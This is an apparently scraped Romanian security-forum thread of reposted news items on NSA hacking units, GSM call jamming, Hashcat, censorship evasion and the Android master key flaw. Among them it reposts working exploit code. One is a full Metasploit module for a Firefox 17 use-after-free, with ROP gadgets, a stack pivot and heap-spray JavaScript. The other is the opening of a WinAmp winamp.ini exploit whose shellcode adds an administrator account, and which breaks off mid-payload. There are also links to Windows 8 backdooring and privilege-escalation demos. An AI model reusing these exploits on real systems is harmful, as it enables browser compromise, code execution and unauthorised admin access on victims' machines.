Nytro

The NSA has its own team of elite hackers By Andrea Peterson, Published: August 29 at 4:51 pm NSA headquarters at Fort Meade, MD where TAO’s main team reportedly works (Wikipedia) Our Post colleagues have had a busy day. First, they released documents revealing the U.S. intelligence budget from National Security Agency (NSA) leaker Edward Snowden. Then they recounted exactly how the hunt for Osama bin Laden went down. In that second report, Craig Whitlock and Barton Gellman shared a few tidbits about the role of the government’s hacking unit, Tailored Access Operations (TAO) in the hunt, writing that TAO “enabled the NSA to collect intelligence from mobile phones that were used by al-Qaeda operatives and other ‘persons of interest’ in the bin Laden hunt.” So just what is Tailored Access Operations? According to a profile by Matthew M. Aid for Foreign Policy, it’s a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications. Aid claims TAO is also responsible for developing programs that could destroy or damage foreign computers and networks via cyberattacks if commanded to do so by the president. So, TAO might have had something to do with the development of Stuxnet and Flame, malware programs thought to have been jointly developed by the U.S. and Israel. The malware initially targeted the Iranian nuclear program, but quickly made its way into the digital wild. According to Aid, TAO’s primary base is in the NSA headquarters in Fort Meade. There, he says, some 600 members of the unit work rotating shifts 24-7 in an “ultramodern” space at the center of the base called the Remote Operations Center (ROC). The unit bears a striking resemblance to a Chinese hacking group described in a report released by cybesecurity company Mandiant earlier this year. The report indicated that that group, APT1, was likely organized by the Chinese military. Perhaps not so coincidentally, Aid says multiple confidential sources have told him that TAO has “successfully penetrated Chinese computer and telecommunications systems for almost 15 years,” in the process, “generating some of the best and most reliable intelligence information about what is going on inside the People’s Republic of China.” But for all the reported secrecy surrounding TAO’s activities, a quick search of networking site LinkedIn shows a number of current and former intelligence community employees talking pretty openly about the exploits. For instance, Brendan Conlon, whose page lists him as a former Deputy Chief of Integrated Cyber Operations for the NSA and former Chief of TAO in Hawaii, says that he led “a large group of joint service NSA civilians and contractors in executing Computer Network Exploitation (CNE) operations against target networks.” Barbara Hunt, who is listed as a former Director of Capabilities at TAO in Fort Meade, similarly claims she was “responsible for end-to-end development and capability delivery to build a versatile computer network exploitation effort.” Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities. He says the 14 personnel under his management have completed “over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements.” Just imagine how productive the team in Fort Meade, rumored to have about 600 people, must be. Sursa: The NSA has its own team of elite hackers

Anatomy of a dropped call - how to jam a city with 11 customised mobile phones by Paul Ducklin on August 29, 2013 When you think of "signal jamming," you probably imagine some kind of fine steel mesh that blocks out radio transmissions altogether, or a source of electromagnetic noise that interferes enough to make legitimate communication impossible. But a paper presented by a trio of German researchers at the recent USENIX Security Symposium reveals a much more subtle approach to jamming mobile phone calls. They were able to convert a single mobile phone into a denial of service (DoS) device that could be turned against another subscriber, perhaps wherever they roamed through a whole town or city. The paper is quite technical, and unavoidably filled with the jargon of mobile telephony, yet the authors have done an excellent job of making it into a comprehensible read that teaches you a number of useful security lessons. As they point out very clearly, many of the security decisions taken in the early days of the GSM (Global System for Mobile) system were based at least in part on security through obscurity. The consensus back then seemed to be, "Nobody will ever be able to build their own base station, or make their own handset!" So why bother going to the trouble of designing in security to protect against the hardware and firmware of the network itself turning hostile? All that has changed, with open source implementations available for both base stations and handsets. As a result, security shortcuts that didn't seem to matter much 20 years ago have come back to haunt us. How your phone receives a call Mobile phones aren't in a perpetual state of readiness to receive calls or SMSes (text messages) instantaneously. Instead, your phone spends most of its time in a low-power mode, from which it can be signalled to wake up fully to accept a call or message. (That's why your phone battery may well last for days when you aren't making or receiving calls, but typically only hours when you are.) Rather casually simplified, and with apologies to the authors of the USENIX paper, this is what happens when a nearby cell tower decides it's time for you to get a call: The base station sends out a broadcast page containing an identification code for your phone. Your phone recognises its own identification code. Your phone wakes up and responds to the base station. The base station and your phone negotiate a private radio channel for the call. Your phone authenticates to the base station. Your phone starts ringing (or an SMS arrives). How an attacker can "jam" your calls You can probably spot what computer scientists call a race condition in the sequence above, caused by the fact that authentication happens late in the game. Every device in range can listen in to the broadcast pages inviting your phone to wake up, so a device that's faster than yours can race you to step 5 and win, causing your phone's attempt to authenticate to be rejected. Of course, the "jamming" phone doesn't know how to authenticate, but that doesn't matter; in fact, it can deliberately fail the authentication, causing the process to bail out at step 5. There is no step 6, so the call is lost - invisibly to you, because you lost the race to reply - and service is denied. The authors got this attack working with a tweaked open source baseband (mobile phone firmware) that was adapted to ensure that it ran faster than a wide range of commercial handsets, including the Apple iPhone 4s, Samsung Galaxy S2 and Blackberry 9300 Curve. How an attacker finds your phone There is no authentication or encryption during the "are you there?" message and the "here I am!" reply, so an attacker doesn't need any cryptographic cleverness to work out which messages are meant for what devices. There is a slight complication, however: the attacker probably doesn't know your phone's identification code in advance. To be strictly correct: the code is tied to your SIM card, not to the phone hardware itself, since every SIM has a unique code called an IMSI (International Mobile Subscriber Identity) burned into it, rather like the MAC address in a network card. But GSM phones deliberately minimise the frequency with which unencrypted IMSIs are visible on the network, in order to provide you with some safety and privacy against being tracked too openly. Instead, occasional exchanges involving your true IMSI are used to produce a regularly changing TMSI, where T stands for Temporary. The TMSI is a pseudorandom, temporary identifier that varies as a matter of course as you turn your phone off and on or roam through a network. The network operator maintains a list to keep track of which TMSI relates to what IMSI at any moment, but that database is unlikely to be accessible to an attacker. The authors used traffic analysis to get round this problem. While sniffing all the TMSIs being broadcast on the network, they call your number 10 to 20 times in quick succession, but deliberately drop each call after a few seconds. The TMSI that suddenly appears 10 to 20 times in quick succession in the sniffer logs, as the network tries to track you down with its broadcast pages, is almost certainly the one they want. Easy, isn't it? ? As long as they drop the call after the TMSI has sent in a broadcast page but before your phone gets past the authentication stage (step 5 above), your phone won't ring and the imposter calls won't show up. That means you won't be aware that anything dodgy is going on. The authors used trial and error to determine a suitable call-drop delay for the network provider they targeted, finding that 3.7 seconds worked well. How the attacker finds out which cell you are in Here's the thing: he doesn't need to know more than your general location. When you receive a call, the mobile network doesn't page for your phone only in one cell of the network - it pages throughout your location area, which is a cluster of base stations in the vicinity. This means that the network doesn't need to keep precise tabs on you all the time, which in turn means that your phone doesn't have to tell the network exactly where it is from moment to moment, thus extending battery life. So as long as I know you are somewhere, say, in the City of Sydney, I can sit in a coffee shop at the Opera House and sniff for your TMSI wherever you go in town, because the broadcast pages that go out when I make those 10 to 20 bogus calls are duplicated everywhere in the location area. The authors did some warmapping drives around Berlin, their home turf, and determined that location areas can be very extensive, ranging from 100km2 to 500km2. (For comparison, the City of Sydney, which stretches from the Harbour Bridge south as far as Central Station, is just 25km2.) How the attacker can amplify the attack Instead of looking out for your TMSI and blocking your calls, what if the attacker wanted to block every call to knock a large metro area out in one go? One rigged sniffer phone alone couldn't do it. The authors found that although their tweaked phone baseband could beat many popular mobile phones in the race to authenticate, it still took about one second to "jam" each broadcast page, limiting each phone to about 60 "jammed" pages per minute. So they built a rig with eleven tweaked phones, thus allowing them to subvert more than 600 broadcast pages per minute. Their measurements suggested this would be enough to knock out the service of at least some of the four major German operators across one location area (100km2 - 500km2) in metro Berlin. Remember that the eleven attack phones don't have to be distributed through the location area, since all broadcast pages are replicated through all cells in the area. The only problem the authors faced was how to allocate the TMSI broadcasts amongst their eleven tweaked phones. Using a messaging system to hand out each successively sniffed TMSI to the next phone on the list required the use of a serial connection to each phone, which was too slow. In the end, they simply allowed each phone to select TMSIs by a bit pattern, so that phone 1, for example, might handle TMSIs starting with the bytes 0x00 to 0x1F, and so on. ? As an amusing side-effect of tuning the partitioning algorithm to ensure that each phone handled about the same quantity of broadcast pages, the authors noticed that the bytes in most TMSIs were far from randomly distributed. Ironically, in this case, the lack of randomness made the partitioning job harder, not easier. What about interception, not just jamming? As the authors note, in some mobile networks, they could go further than just cancelling your calls and knocking you off the network. They observed that some networks, presumably for performance reasons, cheat a little on step 5, and don't authenticate every call. In these cases, an attacker who can win the race to the authentication stage (step 5 above) can do more than cancel your call - he can accept it instead (or receive your SMS), from anywhere in your location area, and you won't realise. Also, some networks still use outdated, broken versions of the A5 encryption algorithm that is part of the GSM standard. On these networks, your calls can be sniffed and decrypted anyway, but in a busy metro area, an attacker is faced with problems of volume: how to home in automatically only on the calls he really wants to intercept, without having to listen to everyone else's chatter too. The authors' "jamming" firmware could be modified to do just that job, used as a call alerting mechanism instead of for a denial of service. ? Sniffing the call data for later decryption can't be done from anywhere in the location area, which is a small mercy, so an attacker needs to be in the same cell as you. What to do about it? You can probably guess what mitigations the authors proposed, because they are obvious and easy to say; you will also probably wonder if they will ever happen, because they involve change, and potentially disruptive change at that, so they are hard to do. Defending against the eavesdropping and call hijacking problems is straightforward: perform authentication for every call or SMS, and don't use broken versions of the GSM cipher. The system already supports everything that's needed; all that is required is for it to be turned on and used by every operator. Defending against the denial of service problem is slightly trickier, as it needs a protocol change: move authentication up the batting order to prevent the race condition. The authors propose a technically simply way to do this, but it means shifting some of the cryptographic operations from the authentication stage (step 5 above) to the "are you there?/here I am!" stages (steps 1 and 2). Unfortunately, these mitigations don't include steps you can take to help yourself; they need changes from the mobile operators. Will that happen? Or will backward compatibility, the thorn that is making Windows XP so hard to dislodge, get in the way yet again? Sursa: Anatomy of a dropped call – how to jam a city with 11 customised mobile phones | Naked Security

Apple's new technology will allow government to control your iPhone remotely Author: Mohit Kumar, The Hacker News Recently, The Social Media is buzzing over reports that Apple has invented a new technology that now can Switch off iPhone Camera and Wi-Fi, when entering a 'sensitive area'. Technology would broadcast a signal to automatically shut down Smartphone features, or even the entire phone. Yes ! It's true, On June 2008 - Apple filed a patent (U.S. Patent No. 8,254,902) - titles “Apparatus and methods for enforcement of policies upon a wireless device” that defines the ability of U.S. Government to remotely disable certain functions of a device without user consent. All they need to do is decide that a public gathering or venue is deemed sensitive and needs to be protected from externalities. Is it not a shame that you can't take a photo of the police officer beating a man in the street because your oppressive government remotely disabled your Smartphone camera? Civil liberties campaigners fear it could be misused by the authorities to silence 'awkward citizens'. Apple insists that the affected locations are normally cinemas, theaters and concert grounds, but Apple admits it could also be used in covert police or government operations that may need complete blackout conditions. "This technology would be a dangerous power to place in the hands of the government," Kurt Opsahl, a civil liberties lawyer at Electronic Frontier Foundation (EFF). "The government shutting down iPhone cameras and connectivity in order to prevent photos of political activity or the organization of the event would constitute a prior restraint on the free speech rights of every person affected, whether they're an activist or an observer" he added. Apple also says that the user can be given a choice to approve changes being sent remotely, however one cannot rule out the possibility of some changes being applied to the device without user consent. Sursa: Apple's new technology will allow government to control your iPhone remotely - The Hacker News

Da, s-ar mai putea configura: 1. Intervalul la care sa verifice daca sunt posturi noi 2. Timeout-ul pentru acel popup Buna treaba.

Da, pacat ca e scris in Ruby.

Metasploit - The Exploit Learning Tree Author Mohan Santokhi This is a whitepaper called Metasploit - The Exploit Learning Tree. Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and try to decipher how the various classes and modules hang together to produce the various functions. # Reference 1 /documentation/developers_guide.pdf 2 http://dev.metasploit.com/documents/meterpreter.pdf 3 external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf 4 www.nologin.org/Downloads/Papers/remote-library-injection.pdf 5 www.nologin.org/Downloads/Papers/win32-shellcode.pdf 6 Metasploit Unleashed 7 http://www.securitytube.net/groups?operation=view&groupId=10 2 Table of Contents 1 Document Control.................................................................................................................................. 2 1.1 Document Block ............................................................................................................................ 2 1.2 Change History ............................................................................................................................. 2 1.3 References .................................................................................................................................... 2 2 Table of Contents .................................................................................................................................. 3 3 Introduction............................................................................................................................................ 4 4 Setup ..................................................................................................................................................... 5 4.1 Getting started .................................................................................................................................... 5 4.2 Install Missing Gems ........................................................................................................................... 7 4.3 Test the environment .......................................................................................................................... 8 5 Exploit Metamodel ................................................................................................................................. 9 6 Vulnerable Service .............................................................................................................................. 11 7 msfconsole Initialisation Phase ............................................................................................................ 14 8 Use command ..................................................................................................................................... 16 9 Set command ...................................................................................................................................... 18 10 Exploit command ................................................................................................................................. 19 10.1 Create Payload Objects .................................................................................................................. 21 10.2 Generate Encoded Payload ............................................................................................................ 24 10.3 Start handler ................................................................................................................................... 24 10.4 Exploit The Target ........................................................................................................................... 25 10.5 Establish Session ............................................................................................................................ 26 10.6 Interact With Target ......................................................................................................................... 26 11 Meterpreter .......................................................................................................................................... 27 11.1 Meterpreter payloads ...................................................................................................................... 28 11.2 Client components .......................................................................................................................... 30 11.2.1 UI components ............................................................................................................................. 30 11.2.2 Command proxy components ....................................................................................................... 33 11.3 Meterpreter Protocol ....................................................................................................................... 35 11.3.1 Client side protocol API ................................................................................................................ 35 11.3.2 Server side protocol API ............................................................................................................... 37 11.4 Server components ......................................................................................................................... 38 11.5 Server extensions ........................................................................................................................... 41 12 Writing Meterpreter Extensions ............................................................................................................ 43 12.1 Design commands, requests and responses ................................................................................... 43 12.2 Implement skeleton extension ......................................................................................................... 45 12.3 Implement command dispatcher class ............................................................................................ 47 12.4 Implement command proxy class .................................................................................................... 47 13 Railgun ................................................................................................................................................ 48 13.1 Meterpreter scripts .......................................................................................................................... 52 Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf Sursa: Metasploit - The Exploit Learning Tree ? Packet Storm

[h=1]The Future is Here: C++ 11[/h] Publicat la 28.08.2013 Special Guest Lecture by C++ Inventor Bjarne Stroustrup

Conturile mai vechi, ca al meu, aveau deja 25 GB.

[h=1]Visual Studio 2013 IDE[/h] Posted: 16 hours ago By: Robert Green MP3 (Audio only) [h=3]File size[/h] 29.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 177.5 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 103.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 387.4 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 271.3 MB High Quality WMV (PC, Xbox, MCE) In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including: Signing into the IDE to synchronize your settings [00:40] Notifications center [06:00] Improvements to overall look and feel [11:30] Auto brace completion [16:00] Enhanced scroll bar [18:45] Improved Navigate To experience [20:00] Peek Definition [22:00] CodeLenses [24:50] Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9

[h=1]From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS[/h] Posted: 1 day ago By: Charles High Quality WMV (PC, Xbox, MCE) MP3 (Audio only) MP4 (iPod, Zune HD) Mid Quality WMV (Lo-band, Mobile) This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy. Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9

[h=1]Hashcat Can Now Be Used to Crack 55-Character Passwords[/h] August 28th, 2013, 11:38 GMT · By Eduard Kovacs The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters. A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it’s becoming easier for cybercriminals to crack the hashes. The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be utilized to crack passwords that are longer than 15 characters. The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was “by far one of the most requested features.” “We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52,” Jens Steube, the lead Hashcat developer, wrote in the release notes. Sursa: Hashcat Can Now Be Used to Crack 55-Character Passwords

Evading Internet Censorship This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk: Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters. Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked. Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware work and how to effectively defeat it. Download: http://blanu.net/Dust.pdf Sursa: https://www.schneier.com/blog/archives/2013/08/evading_interne.html

Firefox XMLSerializer Use After Free Authored by regenrecht, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This Metasploit module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox XMLSerializer Use After Free', 'Description' => %q{ This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # Vulnerability Discovery, Analysis and PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0753' ], [ 'OSVDB', '89021'], [ 'BID', '57209'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ], [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ], [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependMigrate' => true }, 'Payload' => { 'BadChars' => "\x00", 'DisableNops' => true, 'Space' => 30000 # Indeed a sprayed chunk, just a high value where any payload fits }, 'Platform' => 'win', 'Targets' => [ [ 'Firefox 17 / Windows XP SP3', { 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory 'FakeVFTable' => 0x0c10100c, # Pointer to the Sprayed Memory 'RetGadget' => 0x77c3ee16, # ret from msvcrt 'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt 'StackPivot' => 0x77c15ed5, # xcht eax,esp # ret msvcrt } ] ], 'DisclosureDate' => 'Jan 08 2013', 'DefaultTarget' => 0)) end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def on_request_uri(cli, request) agent = request.headers['User-Agent'] vprint_status("Agent: #{agent}") if agent !~ /Windows NT 5\.1/ print_error("Windows XP not found, sending 404: #{agent}") send_not_found(cli) return end unless agent =~ /Firefox\/17/ print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end # Fake object landed on 0x0c101008 if heap spray is working as expected code = [ target['FakeVFTable'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['PopRetGadget'], 0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis ].pack("V*") code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer) code << [target['PopRetGadget']].pack("V") # pop # ret code << [target['StackPivot']].pack("V") # stackpivot # xchg eax # esp # ret code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch)) js_ptr = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch)) content = <<-HTML <html> <script> var heap_chunks; function heapSpray(shellcode, fillsled) { var chunk_size, headersize, fillsled_len, code; var i, codewithnum; chunk_size = 0x40000; headersize = 0x10; fillsled_len = chunk_size - (headersize + shellcode.length); while (fillsled.length <fillsled_len) fillsled += fillsled; fillsled = fillsled.substring(0, fillsled_len); code = shellcode + fillsled; heap_chunks = new Array(); for (i = 0; i<1000; i++) { codewithnum = "HERE" + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } } function gen(len, pad) { pad = unescape(pad); while (pad.length < len/2) pad += pad; return pad.substring(0, len/2-1); } function run() { var container = []; var myshellcode = unescape("#{js_code}"); var myfillsled = unescape("#{js_random}"); heapSpray(myshellcode,myfillsled); var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}"; var small = gen(72, fake); var text = 'x'; while (text.length <= 1024) text += text; var parent = document.createElement("parent"); var child = document.createElement("child"); parent.appendChild(child); child.setAttribute("foo", text); var s = new XMLSerializer(); var stream = { write: function() { parent.removeChild(child); child = null; for (i = 0; i < 2097152; ++i) container.push(small.toLowerCase()); } }; s.serializeToStream(parent, stream, "UTF-8"); } </script> <body onload="run();"> </body> </html> HTML print_status("URI #{request.uri} requested...") print_status("Sending HTML") send_response(cli, content, {'Content-Type'=>'text/html'}) end end Sursa: Firefox XMLSerializer Use After Free ? Packet Storm

Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Steven's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real. This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata. Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension. Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact. Sursa: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies Kewl stuff

Kali Linux - Backdooring Windows 8 https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70 Description: In this video you will learn how to exploit windows 8 using metasploit framework and how you can maintain your access on Windows 8 Using Kali Linux and metapsloit. Sursa: Kali Linux - Backdooring Windows 8

Gps Hacking Description: GPS Hacking For More Information please visit : Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV Sursa: Gps Hacking

Windows Universal Privilege Escalation Exploit Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo Skiddie, dar poate util/necesar. Sursa: Windows Universal Privilege Escalation Exploit

Android Master Key Vulnerability—PoC Rohit T August 28, 2013 The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It’s very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let’s look into what the issue is, how hackers can exploit it, and what needs to be done to fix it. How Does Android Code Signing Work? Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the application MyFirstApp.apk application which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue. Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. Why would you want to sign the piece of code? For two reasons basically—authenticity and integrity. Before installing any application, I want to make sure that the application isn’t tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building and application and signing it with a certificate, you basically have an APK file at the end. MyFirstApp.apk MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator. APK files are nothing but collection of zip files. So if you rename an .apk extension as .zip you will be able to see the contents of the file. As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest-value of each file in the archive. Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF: Now try to modify any of these files; for example, modify the launch image file inside MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using the adb and you will find that Android rightly notices it and shows this message: How Is the Attack Accomplished? The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code. The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn’t prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below. The ic_launcher.png file is something that I have added to the existing file and created a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate and Android happily accepts the same. How Is This Even Possible? This is possible because Android verifies the first version of any file in archive but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is a fake but what gets verified for signature is legitimate part. What Are the Implications? The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user’s knowledge, make background calls, take pictures and forward to mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the play store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system and their applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always internet connected mobile phones. The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers by publishing popular games in third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the play store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren’t going to help the cause. What Precautions Could Help Users to Stay Away from This? It’s important to download the apps only from the Google Play Store and, even while downloading from the play store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say “No” to side loading of applications. In short, make sure you identify the publisher of the application before you install one. Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available. Apart from these, an application also released in Play Store, “Blue Box Security Scanner,” will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program. Video Here is the video link that practically demonstrates how this can be accomplished: Sursa: Android Master Key Vulnerability—PoC

[h=1]WinAmp 5.63 (winamp.ini) - Local Exploit[/h] # Exploit Title: winampevilskin.py # Date: 25 August 2013 # Exploit Author: Ayman Sagy <aymansagy@gmail.com> # Vendor Homepage: http://www.winamp.com/ # Version: 5.63 # Tested on: Windows XP Professional SP3 Version 2002 # CVE : 2013-4694 # # Ayman Sagy <aymansagy@gmail.com> August 2013 # # This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/ # Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security # # The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup # # # I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it # If you can make it work or find a solution for ASLR/DEP please contact me # # So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it # The egg and shellcode can be found in plain ASCII in memory # # Tested against Windows XP Pro SP3 # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0 # run with Python 2.7 import sys, getopt, os def usage(): print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n') print('Usage: python ' + sys.argv[0] + ' -p <payload>') print('Payload could be:') print('\t[user] to create new admin account ayman/P@ssw0rd') print('\t[calc] run calculator') print('for e.g.: python ' + sys.argv[0] + ' -p user') #appdata = os.environ['APPDATA'] # Windows add admin user: ayman P@ssw0rd scadduser = ( b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" + "\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" + "\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" + 